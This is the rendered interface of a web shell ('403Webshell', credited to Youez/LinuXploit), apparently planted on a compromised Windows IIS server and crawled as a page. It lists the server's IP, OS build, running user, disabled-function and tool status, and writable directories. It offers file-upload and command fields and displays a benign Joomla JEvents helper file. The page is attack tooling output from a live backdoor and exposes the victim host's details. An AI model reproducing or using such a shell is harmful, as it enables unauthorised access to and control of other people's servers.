403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /inetpub/wwwroot/icd/components/com_jevents/views/default/helpers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /inetpub/wwwroot/icd/components/com_jevents/views/default/helpers/defaultviewnavcattext.php
<?php 
defined('_JEXEC') or die('Restricted access');

function DefaultViewNavCatText($view,$catid, $option, $task, $Itemid ){ 
	$filters = jevFilterProcessing::getInstance(array("category"));
	$filterHTML = $filters->getFilterHTML();

	?>

    	<table cellpadding="0" cellspacing="0" border="0" width="100%">
      		<tr>
        		<td align="center" width="100%">
        			<form action="index.php" method="get">
        				<input type="hidden" name="option" value="<?php echo $option; ?>" />
        				<input type="hidden" name="task" value="<?php echo $task; ?>" />
        				<input type="hidden" name="offset" value="1" />
        				<?php
        				/*Categories Select*/
        				/*
        				echo JEventsHTML::buildCategorySelect( $catid, 'onchange="submit(this.form)" style="font-size:10px;"',
        					$view->datamodel->accessibleCategoryList() ,false, false, 0,'catids'); 
        					*/
							foreach ($filterHTML as $filter){
								echo $filter["html"];
							}
        					?>
        					
        				<input type="hidden" name="Itemid" value="<?php echo $Itemid; ?>" />
        			</form>
        		</td>
        	</tr>
        </table>
        <?php
	}

Youez - 2016 - github.com/yon3zu
LinuXploit